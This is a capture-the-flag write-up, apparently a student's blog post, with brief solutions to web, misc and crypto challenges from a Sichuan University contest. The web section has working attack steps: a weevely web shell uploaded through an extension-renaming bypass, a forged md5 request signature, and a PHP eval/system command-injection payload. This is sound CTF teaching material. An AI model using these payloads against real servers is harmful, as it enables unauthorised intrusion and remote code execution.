现充|junyu33

Sichuan University CTF shixun cup wp

It's just the same material covered in class, even simpler than what I studied a year ago for the school entrance exam.

WEB

Easy_Flag

Press ctrl+u to view the source code:

<meta http-equiv="" content=""  charset="utf-8"/>
Nothing here~
<!--flag.php-->
<script type="text/javascript" charset="utf-8">
    
    document.oncontextmenu = function() {
        event.returnValue = false;
        alert('Want to see the code?');
    };
   
    document.onkeydown = document.onkeyup = document.onkeypress = function(event) {
        let e = event || window.event || arguments.callee.caller.arguments[0];
        if (e && e.keyCode == 123) {
            e.returnValue = false;
            alert('Didn't expect that, did you? This won't work either.');
            return false;
        }
    };
</script>

Follow the hint and check /flag.php.

Easy_Button

Change maxlength to 50 in f12, then post any phone number in hackbar.

For example: phone=12312312312

Easy_Browser

View the source code:

    <html>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <body>
        The page has nothing
        <!--Check what's in the cookie-->
    </body>
    </html>

Follow the hint and check the cookie.

Access /get.php and submit a parameter named "flag" with a value of 1.

/get.php?flag=1

Blind guess: upload.php, found an image upload button provided.

I'm on Linux and can't install AntSword, so I'm using weevely here.

weevely generate 1234 ./114514.php
mv 114514.php 114514.jpg

When submitting, use Burp Suite to intercept the packet and change the extension back to .php.

weevely http://47.116.24.9:81/upload/114514.php 1234

After entering the shell:

ls
cat flag_859421239.txt

Lucky Draw Game

After the lucky draw, capture the packet:

GET /ctf4/check.php?tar=12&sign= HTTP/1.1
Host: 47.116.24.9
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://47.116.24.9/ctf4/game.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sign=md5(tar)
Connection: close

Blind guess: tar=flag, then sign=md5('flag')=327a6c4304ad5938eaf0efb6cc3e53dc

Submit after modifying the GET parameters accordingly.

Rceeeee

Filter Evasion:

?data=eval($_GET[1]);&1=system('ls');

The rest is up to you.

Miscellaneous

Calabash Brothers

After extraction, modify the height of the PNG image.

File_Error

This is a ZIP file with pseudo-encryption.

shark

The problem says the flag can be found just by searching, so let's search directly.

cat webone.pcap | grep -a flag

Crypto

Check-in Question

urldecode

https://www.urldecoder.io/

Fence Cipher

Fence cipher

https://www.qqxiuzi.cn/bianma/zhalanmima.php

Number of characters per group: 9

Romeo and Juliet

A combination of Braille cipher, Pigpen cipher, and Templar cipher. Decrypt them one by one.